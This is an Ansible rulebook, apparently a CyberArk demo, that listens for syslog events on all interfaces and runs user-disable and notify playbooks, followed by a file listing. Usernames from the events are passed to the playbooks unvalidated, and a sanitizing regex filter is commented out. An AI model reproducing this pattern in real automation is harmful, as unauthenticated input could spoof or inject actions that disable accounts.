```yaml
- name: Demo rules with CyberArk syslog as source
  hosts: localhost
  sources:
    # Syslog listener for CyberArk events, bound to all interfaces on port 1514
    - cyberark.pas.syslog:
        host: 0.0.0.0
        port: 1514
  rules:
    - name: Check For User Suspension Event, Then Disable The User and Notify
      condition: event.cyberark.syslog.audit_record.Severity == "Error" and event.cyberark.syslog.audit_record.MessageID == "5"
      action:
        run_playbook:
          name: disable_user.yml
          extra_vars:
            # Value is taken from the received event and passed to the playbook as-is
            username: "{{ event.cyberark.syslog.audit_record.Issuer }}"
    - name: Check For PTA irregular IP OR irregular Hours Access and Notify
      condition: event.cyberark.DeviceEventClassID == "25" or event.cyberark.DeviceEventClassID == "23"
      action:
        run_playbook:
          name: pta_disable_notify.yml
          extra_vars:
            username: "{{ event.cyberark.suser }}"
            # Alternative: pass only the leading [a-zA-Z0-9_] run of suser
            #username: "{{ event.cyberark.suser | ansible.builtin.regex_search('^[a-zA-Z0-9_]+') }}"
            eventname: "{{ event.cyberark.DeviceName }}"
            eventurl: "{{ event.cyberark.PTALink }}"
            station: "{{ event.cyberark.shost }}"
```

| Name | Type | Size | Permission |
|---|---|---|---|
| cyberark_test_rule.yml | File | 1.09 KB | 0644 |
| disable_pas_user_kafka.yml | File | 560 B | 0644 |
| disable_pas_user_webhook.yml | File | 540 B | 0644 |
| disable_user.yml | File | 1.17 KB | 0644 |
| inventory.yml | File | 69 B | 0644 |
| pta_disable_notify.yml | File | 1.31 KB | 0644 |
| pta_notify.yml | File | 602 B | 0644 |